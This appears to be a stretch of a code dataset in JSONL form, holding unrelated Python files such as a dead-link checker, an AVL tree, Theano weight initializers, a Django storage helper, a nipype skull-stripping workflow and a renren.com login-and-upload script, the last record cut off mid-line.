[item.strip() for item in extract]\n\t\taddress_list = [item for item in extract if item]\n\t\textract_addr = self._reduce_address(address_list[0], address_list[1])\n\n\t\taddress = geocode(extract_addr)\n\n\t\t\"\"\"\n\t\tsearch address list for phone number, if none found\n\t\tparse the contact page and look for a phone number\n\t\t\"\"\"\n\t\tfor item in address_list:\n\t\t\tfind_phone = self.props['phone'].search(item)\n\t\t\tif find_phone:\n\t\t\t\tself.phone = find_phone.group()\n\t\t\t\tbreak\n\n\t\t# email has the format news@hostname.com\n\t\temail = self.props['email'].search(page.text)\n\t\tif email:\n\t\t\tself.email = email.group().strip()\n\n\t\treturn address\n","sub_path":"source/np/tx/aim_media.py","file_name":"aim_media.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638979004","text":"import os\nimport glob\nimport re\n\ndef check_for_bad_links(doc_path, links, image_links, data):\n reg = r'\\[.+?\\]\\((\\/.*?)\\)'\n matches = re.findall(reg, data)\n for match in matches: \n if match not in links:\n print(f\"Dead link: {match} found in {doc_path}\")\n\n # Check image links\n reg = r'!\\[\\]\\((\\/.*?)\\)'\n matches = re.findall(reg, data)\n for match in matches:\n if match not in image_links:\n print(f\"Dead image link: {match} found in {doc_path}\")\n\ndef crawl_docs():\n file_paths = []\n links = []\n image_links = []\n\n base_directory = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"docs\")\n for doc_path in glob.glob(base_directory + \"/**/*.md\", recursive=True):\n links.append((\"/\" + os.path.relpath(doc_path, base_directory)).replace(\".md\", \"\").replace(\"\\\\\",\"/\"))\n file_paths.append(doc_path)\n \n base_directory = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"docs\", \"public\")\n for doc_path in glob.glob(base_directory + \"/**/*\", recursive=True):\n image_links.append((\"/\" + os.path.relpath(doc_path, base_directory)).replace(\"\\\\\",\"/\"))\n\n return file_paths, links, image_links\n\ndef main():\n file_paths, links, image_links = crawl_docs()\n\n for doc_path in file_paths:\n with open(doc_path, \"r\", encoding='utf-8') as f:\n check_for_bad_links(os.path.relpath(doc_path, os.getcwd()), links, image_links, f.read())\n\nmain()","sub_path":"scripts/dead_links.py","file_name":"dead_links.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"189747811","text":"\ndef filter_by_keywords(data, keywords):\n \"\"\"\n This function(really ugly) filters results by keywords to provide search functionality\n :param data:\n :param keywords:\n :return: filtered data\n \"\"\"\n keywords = [keyword.lower() for keyword in keywords.split()]\n filtered_data = {}\n for key, value in data.items():\n filtered_games = []\n for index in range(len(value)-1):\n if any(word in value[index].lower() for word in keywords):\n filtered_games.append(value[index])\n\n filtered_data[key] = filtered_games\n\n return filtered_data\n","sub_path":"magetic/parces/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141783288","text":"import sys\n\n\nclass Date:\n def __init__(self, yr, mt, dy):\n self.yr = yr\n self.mt = mt\n self.dy = dy\n\n # format for MDYYYY\n def MDYYYY(self):\n print(f'{self.mt}/{self.dy}/{self.yr}')\n\n # format for MDYY\n def MDYY(self):\n print(f'{self.mt}/{self.dy}/{self.yr}')\n\n # format for YYYYMD\n def YYYYMD(self):\n print(f'{self.yr}/{self.mt}/{self.dy}')\n\n def __str__(self):\n return f'({self.yr}- {self.mt}-{self.dy})'\n\n def __lt__(self, other):\n return (self.yr, self.mt, self.dy) < (other.yr, other.mt, other.dy)\n\n def getYear(self):\n return self.__yr\n\n def getMonth(self):\n return self.__mt\n\n def getDay(self):\n return self.__dy\n\n def setYear(self, y):\n try:\n year = int(y)\n if year < 1:\n raise Exception(\"Invalid Year\")\n except Exception as err:\n print(\"Invalid Year\")\n sys.exit(err)\n else:\n self.__yr = year\n\n def setMonth(self, m):\n try:\n month = int(m)\n if month < 1 or month > 12:\n raise Exception(\"Invalid Month\")\n except Exception as err:\n print(\"Invalid Month\")\n sys.exit(err)\n else:\n self.__mt = month\n\n def setDay(self, d):\n try:\n day = int(d)\n if day < 1 or day > 31:\n raise Exception(\"Invalid Day\")\n except Exception as err:\n print(\"Invalid Day\")\n sys.exit(err)\n else:\n self.__dy = day\n\n\nif __name__ == \"__main__\":\n dates = [\n Date(2020, 9, 24),\n Date(2000, 9, 15),\n Date(0, 2, 29),\n Date(1997, 2, 20),\n Date(2001, 5, 2),\n Date(2001, 5, 1),\n Date(1997, 3, 1),\n ]\n\n print(\"dates before sorting : \")\n for d in dates:\n print(d)\n\n sortedDates = sorted(dates, key=lambda x: (x.yr, x.mt, x.dy))\n\n print(\"\\nstudents after sorting : \")\n for d in sortedDates:\n print(d)\n","sub_path":"Homework_7/homework_7_3.py","file_name":"homework_7_3.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"166423905","text":"#!/usr/bin/env python -tt\n\"\"\"\nLibrary for HostManagement Objects\n\"\"\"\n\nimport logging\nimport datetime\nfrom DatabaseManager import DatbaseManager\nfrom utils import write_dict_to_json_file\n\n__author__ = \"Thomas Jongerius\"\n__copyright__ = \"Copyright 2016, Thomas Jongerius\"\n__credits__ = [\"Thomas Jongerius\", \"Alan Holt\"]\n__license__ = \"GPL\"\n__version__ = \"0.1\"\n__maintainer__ = \"Thomas Jongerius\"\n__email__ = \"thomasjongerius@yaworks.nl\"\n__status__ = \"Development\"\n\n\nclass Device(object):\n '''\n Device object containing device settings.\n '''\n\n def __init__(self, name, db_id=None,\n ipv4=None, username=None,\n password=None, port=None,\n prompt=None, timeout=10,\n ssh=None, telnet=None,\n post_commands=[],\n connection_type='SSH'):\n\n self.name = name\n self.db_id = db_id\n self.ipv4 = ipv4\n\n self.connection_settings = {\n \"USERNAME\": username,\n \"PASSWORD\": password,\n \"PROMPT\": prompt,\n \"SSH_COMMAND\": ssh,\n \"TELNET_COMMAND\": telnet,\n \"CONNECTION_PORT\": port,\n \"TIMEOUT\": timeout,\n \"POST_COMMANDS\": post_commands,\n \"CONNECTION_TYPE\": connection_type\n }\n\n def all_node_details(self):\n '''\n Function to return all node details.\n '''\n\n all_node_details = {}\n all_node_details['NAME'] = self.name\n all_node_details['DB_ID'] = self.db_id\n all_node_details['IPV4'] = self.ipv4\n all_node_details['CONNECTION_SETTINGS'] = self.connection_settings\n\n return all_node_details\n\nclass HostManagment(Device):\n '''\n Host Manager to keep data for hosts. Export, and import data.\n '''\n\n def __init__(self, prefix=None, postfix='.log', db=DatbaseManager):\n super(Device, self).__init__()\n\n self.hm = {}\n self.prefix = prefix\n self.postfix = postfix\n self.db = db\n\n def add_host(self, host, **kwargs):\n '''\n Function to add host to HostManager and add function as required.\n\n Create Device Object and place them into \"Settings\" of specified host of HostManager.\n\n - ipv4 = IPv4 management address\n - db_id = Database Identifier if applicable\n - prompt = Prompt of device (as of beginning new line)\n - timeout = settings for node\n '''\n self.hm[host] = {}\n\n d = Device(host)\n\n if kwargs:\n if 'ipv4' in kwargs:\n d.ipv4 = kwargs['ipv4']\n if 'db_id' in kwargs:\n d.db_id = kwargs['db_id']\n if 'prompt' in kwargs:\n d.connection_settings['PROMPT'] = kwargs['prompt']\n if 'timeout' in kwargs:\n d.connection_settings['TIMEOUT'] = kwargs['timeout']\n\n self.hm[host]['SETTINGS'] = d\n\n def add_command(self, host, command, output=None):\n '''\n Function to add command to host and timestamp of output retrieval.\n\n Args:\n output (basestring): Output as string\n command (basestring): Command as string\n host (basestring): Hostname or IP as referenced in HostManager\n\n '''\n\n if host not in self.hm:\n self.add_host(host)\n\n if 'COMMANDS' not in self.hm[host]:\n self.hm[host]['COMMANDS'] = {}\n\n self.hm[host]['COMMANDS'][command] = {\n 'OUTPUT': output,\n 'TIMESTAMP': str(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'))\n }\n\n def write_to_json(self, filename):\n '''\n Output to JSON file as specified\n\n Args:\n filename (basestring): Path to JSON file for output\n '''\n logging.debug(\"Writing JSON output to {}...\".format(filename))\n\n # Remove device object as it is not exportable to JSON\n json_out = {}\n for x in self.hm:\n json_out[x] = {}\n for y in self.hm[x]:\n if y == 'SETTINGS':\n json_out[x]['SETTINGS'] = self.hm[x]['SETTINGS'].all_node_details()\n else:\n json_out[x][y] = self.hm[x][y]\n\n write_dict_to_json_file(filename, json_out, indent=2)\n\n def write_to_txt_files(self, output_dir):\n '''\n Output to text files to path as specified\n\n Args:\n output_dir (basestring): Path to directory for output\n '''\n\n logging.debug(\"Writing files to {}...\".format(output_dir))\n for host in self.hm:\n if 'COMMANDS' in self.hm[host]:\n for command in self.hm[host]['COMMANDS']:\n self.create_file(host=host, command=command,\n output=self.hm[host]['COMMANDS'][command]['OUTPUT'],\n output_dir=output_dir)\n\n def write_to_db(self):\n '''\n Output to DataBase if database object is given.\n '''\n\n if isinstance(self.db, DatbaseManager):\n logging.debug(\"Writing output to database...\")\n\n # Format for supported DataBase Object\n db_output = {}\n\n for host in self.hm:\n db_output[self.hm[host]['SETTINGS'].db_id] = {}\n\n if 'COMMANDS' in self.hm[host]:\n for command in self.hm[host]['COMMANDS']:\n db_output[self.hm[host]['SETTINGS'].db_id][command] = {\n 'OUTPUT': self.hm[host]['COMMANDS'][command]['OUTPUT'],\n 'NAME': host,\n 'TIMESTAMP': self.hm[host]['COMMANDS'][command]['TIMESTAMP']\n }\n\n # Connect and send to database\n self.db.connect()\n self.db.save_command_output(db_output)\n self.db.disconnect()\n else:\n logging.error(\"Database object not loaded into HostManager! Did not save data to DB!\")\n\n def create_file(self, host, output, output_dir, sep='_', command=None, timestamp=None):\n '''\n Function to create files in desired output directory with options. This will create a file for\n each host and each command.\n\n Args:\n timestamp (basestring): If given, timestamp will be embedded into filename\n command (basestring): Command-name that will be embedded in filename\n output_dir (basestring): String to path for output\n output (basestring): String for output in file\n host (basestring): Hostname or IP for reference in file\n\n '''\n\n # Setting up path\n s = sep\n filename = output_dir + host\n\n if command:\n command = command.replace(' ', '_')\n filename = filename + s + command\n\n if timestamp:\n filename = filename + s + timestamp\n\n if self.postfix:\n filename = filename + self.postfix\n\n # Write to file\n target = open(filename, 'w')\n target.writelines(output)\n target.close()\n\n logging.debug(\"Write output to: {}\".format(filename))\n","sub_path":"cli_collector/lib/HostManager.py","file_name":"HostManager.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"542355437","text":"import numpy as np\nimport scipy.stats\nimport theano\nimport theano.tensor as T\n\nfrom . import base\n\n\ndef scale_inits(scale, **filter_dsl_kwargs):\n if scale == \"relu\":\n scale = float(np.sqrt(2))\n\n def inner(hs):\n var = hs.kwargs[\"var\"]\n var.set_value(var.get_value() * scale)\n return hs()\n\n return base.filter_dsl(inner,\n key=\"initialize\",\n **filter_dsl_kwargs)\n\n# ############################## general inits ##############################\n\n\ndef constant(value=0.0):\n def constant_inner(var):\n tmp = np.zeros_like(var.get_value(borrow=True))\n tmp += value\n var.set_value(tmp)\n\n return constant_inner\n\n\ndef random_normal(std, mean=0.0):\n def inner(var):\n val = np.random.normal(\n loc=mean,\n scale=std,\n size=base.shape(var),\n ).astype(var.dtype)\n var.set_value(val)\n\n return inner\n\n\ndef random_truncated_normal(std,\n mean=0.0,\n truncation=(-2, 2),\n rescale_std=True):\n def random_truncated_normal_inner(var):\n dist = scipy.stats.truncnorm(*truncation)\n raw = dist.rvs(base.shape(var))\n if rescale_std:\n raw = raw / (raw.std() + 1e-8)\n val = (mean + std * raw).astype(var.dtype)\n var.set_value(val)\n\n return random_truncated_normal_inner\n\n\ndef random_uniform(low, high):\n def inner(var):\n val = np.random.uniform(\n low=low,\n high=high,\n size=base.shape(var),\n ).astype(var.dtype)\n var.set_value(val)\n\n return inner\n\n\n# ############################### weight inits ###############################\n\n\ndef set_weight_init(weight_init, **filter_dsl_kwargs):\n def inner(hs):\n var = hs.kwargs[\"var\"]\n metadata = base.variable_metadata(var)\n hs()\n # perform init afterwards so that later defined hooks\n # actually take effect\n if \"in_axes\" in metadata and \"out_axes\" in metadata:\n weight_init(var)\n\n return base.filter_dsl(inner,\n key=\"initialize\",\n **filter_dsl_kwargs)\n\n\ndef xavier_magnitude(var):\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n in_axes = metadata[\"in_axes\"]\n out_axes = metadata[\"out_axes\"]\n other_axes_size = np.prod([s\n for dim, s in enumerate(shape)\n if not ((dim in in_axes) or\n (dim in out_axes))])\n in_axes_size = np.prod(shape[in_axes])\n out_axes_size = np.prod(shape[out_axes])\n\n return float(np.sqrt(2.0 / ((in_axes_size + out_axes_size) *\n other_axes_size)))\n\n\ndef xavier_normal(var):\n std = xavier_magnitude(var)\n random_normal(std=std)(var)\n\n\ndef xavier_uniform(var):\n magnitude = float(np.sqrt(3)) * xavier_magnitude(var)\n random_uniform(low=-magnitude, high=magnitude)(var)\n\n\ndef msr_magnitude(var):\n \"\"\"\n http://arxiv.org/abs/1502.01852\n\n NOTE: also called He init\n \"\"\"\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n out_axes = metadata[\"out_axes\"]\n # consider all non-out_axes as in_axes\n in_axes_size = np.prod([s\n for dim, s in enumerate(shape)\n if dim not in out_axes])\n # NOTE: this is actually sqrt(2) in the paper, but a gain of sqrt(2)\n # is recommended for ReLUs\n return float(np.sqrt(1.0 / in_axes_size))\n\n\ndef msr_normal(var):\n std = msr_magnitude(var)\n random_normal(std=std)(var)\n\n\ndef msr_uniform(var):\n magnitude = float(np.sqrt(3)) * msr_magnitude(var)\n random_uniform(low=-magnitude, high=magnitude)(var)\n\n\ndef orthogonal(var):\n \"\"\"\n http://arxiv.org/abs/1312.6120\n\n implementation from Sander Dieleman\n \"\"\"\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n in_axes = metadata[\"in_axes\"]\n out_axes = metadata[\"out_axes\"]\n\n assert len(shape) >= 2\n\n # consider all non-out_axes as in_axes\n tmp_out_shape = []\n tmp_in_shape = []\n in_axes_size = 1\n out_axes_size = 1\n tmp_order = list(out_axes)\n for dim, s in enumerate(shape):\n if dim in out_axes:\n out_axes_size *= s\n tmp_out_shape.append(s)\n else:\n in_axes_size *= s\n tmp_in_shape.append(s)\n tmp_order.append(dim)\n # calculate matrix shape\n flat_shape = (out_axes_size, in_axes_size)\n # make orthogonal matrix\n a = np.random.normal(0.0, 1.0, flat_shape)\n u, _, v = np.linalg.svd(a, full_matrices=False)\n # pick the one with the correct shape\n q = u if u.shape == flat_shape else v\n # reshape to temporary shape\n q = q.reshape(tmp_out_shape + tmp_in_shape)\n # transpose out axes from the beginning\n transpose_axes = [None] * len(shape)\n for idx, dim in enumerate(tmp_order):\n transpose_axes[dim] = idx\n res = np.transpose(q, axes=transpose_axes)\n\n var.set_value(res.astype(var.dtype))\n\n\n# ############################### other inits ###############################\n\n\ndef set_lstm_forget_bias_init(init_value=0.):\n init = constant(init_value)\n\n def set_lstm_forget_bias_init_apply(hs):\n var = hs.kwargs[\"var\"]\n hs()\n init(var)\n\n def set_lstm_forget_bias_inner(hs):\n hs.hooks += [\n base.filter_dsl(set_lstm_forget_bias_init_apply,\n key=\"initialize\",\n variable_scope=[\"lstm\", \"forget\", \"bias\"]),\n base.filter_dsl(set_lstm_forget_bias_init_apply,\n key=\"initialize\",\n variable_scope=[\"lstm\", \"multi_bias\", \"forget\"]),\n ]\n return hs()\n\n return set_lstm_forget_bias_inner\n","sub_path":"thu/inits.py","file_name":"inits.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"603725380","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def EntryNodeOfLoop(self, pHead):\n # write code here\n dummy = ListNode(None)\n dummy.next = pHead\n slow_point = dummy.next\n fast_point = dummy.next\n new_point = dummy.next\n while fast_point.next is not None and fast_point.next.next is not None:\n fast_point = fast_point.next.next\n slow_point = slow_point.next\n if slow_point == fast_point:\n # 存在环\n while new_point != slow_point:\n new_point = new_point.next\n slow_point = slow_point.next\n return new_point\n return None","sub_path":"剑指offer/55_链表中环的入口.py","file_name":"55_链表中环的入口.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429539203","text":"import os\nimport django\nos.environ.setdefault('DJANGO_SETTING_MODULE', 'test_Create.settings')\ndjango.setup()\n\nfrom TestModel.models import DisasterInfo,DeathStatistics,InjuredStatistics,MissingStatistics\n\n#下一步存数据库就行了-_-\n\nclass Storage:\n def disasters_storage(self,disastersList):\n for disasterDic in disastersList:\n disaster=DisasterInfo(ID=str(disasterDic['ID']),location=disasterDic['location'],\n date=disasterDic['date'],longitude=float(disasterDic['longitude']),\n latitude=float(disasterDic['latitude']),depth=int(disasterDic['depth']),\n magnitude=float(disasterDic['magnitude']),reportingUnit=disasterDic['reportingUnit'])\n disaster.save()\n disaster.clean()\n\n def death_storage(self, deathDic):\n try:\n death = DeathStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(deathDic['earthquakeId'])),\n location=deathDic['location'],\n date=deathDic['date'],\n number=deathDic['number'],\n reportingUnit=deathDic['reportingUnit'])\n death.save()\n death.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n def injured_storage(self, injuredDic):\n try:\n injured = InjuredStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(injuredDic['earthquakeId'])),\n location=injuredDic['location'],\n date=injuredDic['date'],\n number=injuredDic['number'],\n reportingUnit=injuredDic['reportingUnit'])\n injured.save()\n injured.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n def missing_storage(self, missingDic):\n try:\n missing = MissingStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(missingDic['earthquakeId'])),\n location=missingDic['location'],\n date=missingDic['date'],\n number=missingDic['number'],\n reportingUnit=missingDic['reportingUnit'])\n missing.save()\n missing.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n\n\n\n","sub_path":"learn_django/test_Create/TestModel/Store.py","file_name":"Store.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429829041","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces import afni\n\ndef afni_wf(name='AFNISkullStripWorkflow'):\n \"\"\"\n Skull-stripping workflow\n\n Derived from the codebase of the QAP:\n https://github.com/preprocessed-connectomes-project/\\\nquality-assessment-protocol/blob/master/qap/anatomical_preproc.py#L105\n\n\n \"\"\"\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(fields=['in_file']),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(fields=['out_file', 'out_mask']),\n name='outputnode')\n\n sstrip = pe.Node(afni.SkullStrip(outputtype='NIFTI_GZ'), name='skullstrip')\n sstrip_orig_vol = pe.Node(afni.Calc(\n expr='a*step(b)', outputtype='NIFTI_GZ'), name='sstrip_orig_vol')\n binarize = pe.Node(fsl.Threshold(args='-bin', thresh=1.e-3), name='binarize')\n\n workflow.connect([\n (inputnode, sstrip, [('in_file', 'in_file')]),\n (inputnode, sstrip_orig_vol, [('in_file', 'in_file_a')]),\n (sstrip, sstrip_orig_vol, [('out_file', 'in_file_b')]),\n (sstrip_orig_vol, binarize, [('out_file', 'in_file')]),\n (sstrip_orig_vol, outputnode, [('out_file', 'out_file')]),\n (binarize, outputnode, [('out_file', 'out_mask')])\n ])\n return workflow\n","sub_path":"niworkflows/anat/skullstrip.py","file_name":"skullstrip.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"300883438","text":"from f.tree_node import TreeNode\n\n\nclass AVLSearchTree:\n\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n\n def __len__(self) -> int:\n return self.length()\n\n def __iter__(self):\n return self.root.__iter__()\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __setitem__(self, key, value) -> None:\n self.put(key, value)\n\n def __delitem__(self, key) -> None:\n self.delete(key)\n\n def __contains__(self, key) -> bool:\n return True if self._get(key, self.root) else False\n\n def getTreeValues(self):\n result, items, queue = [], [], []\n if self.root is None:\n return result\n queue.append(self.root)\n while queue:\n current = queue.pop(0)\n items.append(current)\n if current.left is not None:\n queue.append(current.left)\n if current.right is not None:\n queue.append(current.right)\n [result.append(item.value) for item in items]\n return result\n\n def length(self) -> int:\n return self.size\n\n def get(self, key):\n if self.root:\n node = self._get(key, self.root)\n return node.value if node else None\n else:\n return None\n\n def _get(self, key, node: TreeNode):\n if not node:\n return None\n elif key == node.key:\n return node\n elif key < node.key:\n return self._get(key, node.left)\n else:\n return self._get(key, node.right)\n\n def put(self, key, value):\n if self.root:\n self._put(key, value, self.root)\n else:\n self.root = TreeNode(key, value)\n self.size += 1\n\n def _put(self, key, value, node: TreeNode):\n if key < node.key:\n if node.hasLeftChild():\n self._put(key, value, node.left)\n else:\n node.left = TreeNode(key, value, parent=node)\n self._balance(node.left)\n else:\n if node.hasRightChild():\n self._put(key, value, node.right)\n else:\n node.right = TreeNode(key, value, parent=node)\n self._balance(node.right)\n\n def _balance(self, node: TreeNode):\n if node.balanceFactor > 1 or node.balanceFactor < -1:\n self._rebalance(node)\n return\n if node.parent is not None:\n if node.isLeftChild():\n node.parent.balanceFactor += 1\n elif node.isRightChild():\n node.parent.balanceFactor -= 1\n\n if node.parent.balanceFactor != 0:\n self._balance(node.parent)\n\n def _rebalance(self, node: TreeNode) -> None:\n if node.balanceFactor < 0:\n if node.right.balanceFactor > 0:\n self.rotateRight(node.right)\n self.rotateLeft(node)\n else:\n self.rotateLeft(node)\n elif node.balanceFactor > 0:\n if node.left.balanceFactor < 0:\n self.rotateLeft(node.left)\n self.rotateRight(node)\n else:\n self.rotateRight(node)\n\n def delete(self, key) -> None:\n if self.size > 1:\n nodeToRemove = self._get(key, self.root)\n if nodeToRemove:\n self._delete(nodeToRemove)\n self.size -= 1\n elif self.size == 1 and key == self.root.key:\n self.root = None\n self.size -= 1\n else:\n raise KeyError('Key is not in tree')\n\n def _delete(self, node: TreeNode) -> None:\n if node.isLeaf():\n if node == node.parent.left:\n node.parent.left = None\n else:\n node.parent.right = None\n elif node.hasBothChildren():\n sub = node.findSubNode()\n sub.spliceOut()\n node.key = sub.key\n node.value = sub.value\n else:\n if node.hasLeftChild():\n if node.isLeftChild():\n node.left.parent = node.parent\n node.parent.left = node.left\n elif node.isRightChild():\n node.left.parent = node.parent\n node.parent.right = node.left\n else:\n node.replace(node.left.key, node.left.value, node.left.left, node.left.right)\n else:\n if node.isLeftChild():\n node.right.parent = node.parent\n node.parent.left = node.right\n elif node.isRightChild():\n node.right.parent = node.parent\n node.parent.right = node.right\n else:\n node.replace(node.right.key, node.right.value, node.right.left, node.right.right)\n\n def rotateLeft(self, node) -> None:\n \"\"\"\n 左旋前:\n E\n F C\n D B\n A\n\n 左旋后:\n C\n E B\n F D A\n\n 左旋步骤:\n - 将右子节点(节点 C)提升为子树的根节点;\n - 将旧根节点(节点 E)作为新根节点的左子节点;\n - 如果新根节点(节点 C)已经有一个左子节点,将其作为新左子节点(节点 E)的右子节点。\n 因为节点 C 之前是节点 E 的右子节点,所以此时节点 E 必然没有右子节点。\n 因此,可以为它添加新的右子节点,而无须过多考虑。\n \"\"\"\n root = node.right\n node.right = root.left\n if root.left is not None:\n root.left.parent = node\n root.parent = node.parent\n if node.isRoot():\n self.root = root\n else:\n if node.isLeftChild():\n node.parent.left = root\n else:\n node.parent.right = root\n root.left = node\n node.parent = root\n node.balanceFactor = node.balanceFactor + 1 - min(root.balanceFactor, 0)\n root.balanceFactor = root.balanceFactor + 1 + max(node.balanceFactor, 0)\n\n def rotateRight(self, node) -> None:\n \"\"\"\n 右旋前:\n E\n C F\n B D\n A\n\n 右旋后:\n C\n B E\n A D F\n\n 右旋步骤:\n - 将左子节点(节点 C)提升为子树的根节点;\n - 将旧根节点(节点 E)作为新根节点的右子节点;\n - 如果新根节点(节点 C)已经有一个右子节点(节点 D),将其作为新右子节点(节点 E)的左子节点。\n 因为节点 C 之前是节点 E 的左子节点,所以此时节点 E 必然没有左子节点。\n 因此,可以为它添加新的左子节点,而无须过多考虑。\n \"\"\"\n root = node.left\n node.left = root.right\n if root.right is not None:\n root.right.parent = node\n root.parent = node.parent\n if node.isRoot():\n self.root = root\n else:\n if node.isRightChild():\n node.parent.right = root\n else:\n node.parent.left = root\n root.right = node\n node.parent = root\n node.balanceFactor = node.balanceFactor + 1 - min(root.balanceFactor, 0)\n root.balanceFactor = root.balanceFactor + 1 + max(node.balanceFactor, 0)\n","sub_path":"python/tree/f/avl_search_tree.py","file_name":"avl_search_tree.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"587695171","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/common_v32_0\"\n\n\n@dataclass\nclass BillingPointOfSaleInfo3:\n \"\"\"\n Point of Sale information for Billing.\n\n Parameters\n ----------\n origin_application\n Name of the Point of Sale application which initiated the\n Request.This information will be provided as part of the\n provisioning of the user.\n cidbnumber\n A 10 Digit customer number generated by CIDB system.\n \"\"\"\n class Meta:\n name = \"BillingPointOfSaleInfo\"\n namespace = \"http://www.travelport.com/schema/common_v32_0\"\n\n origin_application: None | str = field(\n default=None,\n metadata={\n \"name\": \"OriginApplication\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n cidbnumber: None | str = field(\n default=None,\n metadata={\n \"name\": \"CIDBNumber\",\n \"type\": \"Attribute\",\n \"pattern\": r\"\\d{10}\",\n }\n )\n","sub_path":"travelport/models/billing_point_of_sale_info_3.py","file_name":"billing_point_of_sale_info_3.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"395153165","text":"\n\n\n#登录\n\nimport requests\n\n\ndef login():\n s=requests.Session()\n url='http://www.renren.com/ajaxLogin/login?1=1&uniqueTimestamp=2021032259446'\n data={'email':'13693689954','icode':'','origURL':'http://www.renren.com/home',\n 'domain':'renren.com','key_id':'1','captcha_type':'web_login',\n 'password':'66c479fcdcf98146e021ce8bf614560351b4902edb951bb0ae4fcb4d56f5c4bb',\n 'rkey':'d0cf42c2d3d337f9e5d14083f2d52cb2',\n 'f':'http%3A%2F%2Fwww.renren.com%2F877521005'}\n headers={'Content-Type':'application/x-www-form-urlencoded',\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}\n\n\n r=s.post(url=url,data=data,headers=headers)\n return s\n#登录成功进入个人主页\ndef profile():\n r=login().get(url='http://www.renren.com/877521005')\n print(r.text)\n\n#上传照片接口\ndef upload():\n url='http://upload.renren.com/upload.fcgi?pagetype=nphoto&hostid=877521005&uploadid=1609943209084'\n data={'requestToken':'772812890','_rtk':'f9d12eb4'}\n files={'file':('login.yaml.jpg',open(r'C:\\Users\\Administrator\\Desktop\\20a259868d31ebaa482a6dd4da46652.png','rb'),'image/jpeg',{})}\n headers={'Content-Type':'multipart/form-data'}\n r=login().post(url=url,data=data,files=files,headers=headers)\n","sub_path":"request/文件上传.py","file_name":"文件上传.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"282932486","text":"import sys\r\nimport csv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score as accuracy\r\nfrom sklearn.metrics import roc_curve, auc\r\n\r\ndef get_dataset_from_csv(filename):\r\n \"\"\"Retrieves data from csv file and stores it in numpy arrays\r\n Takes filename\r\n Returns x (raw data), y (indexed labels)\r\n \"\"\"\r\n x = None\r\n y = None\r\n # Open data file\r\n with open(filename, newline='') as stream:\r\n # On successfully opening a stream, count number of lines\r\n num_lines = sum(1 for line in stream)\r\n # Reset filestream to beginning of file\r\n stream.seek(0)\r\n # Instantiate csv reader for file\r\n reader = csv.reader(stream)\r\n\r\n # Read first line of file to get shape and instantiate arrays\r\n row = next(reader)\r\n x = np.zeros((num_lines, len(row)-1), dtype=np.float32)\r\n y = np.zeros(num_lines, dtype=np.int32)\r\n # Add first line to dataset\r\n i = 0\r\n x[i,:] = np.array(row[:-1]).astype(np.float32)\r\n y[i] = int(row[-1].startswith('m'))\r\n i = i + 1\r\n # Add rest of lines to dataset\r\n for row in reader:\r\n x[i,:] = np.array(row[:-1]).astype(np.float32)\r\n y[i] = int(row[-1].startswith('m'))\r\n i = i + 1\r\n return x, y\r\n\r\ndef normalize_columns(data):\r\n \"\"\"Normalize the features to have mean 0 and standard deviation 1\r\n This is done for numerical stability\r\n \"\"\"\r\n stds = np.std(data, axis=0)\r\n mus = np.mean(data, 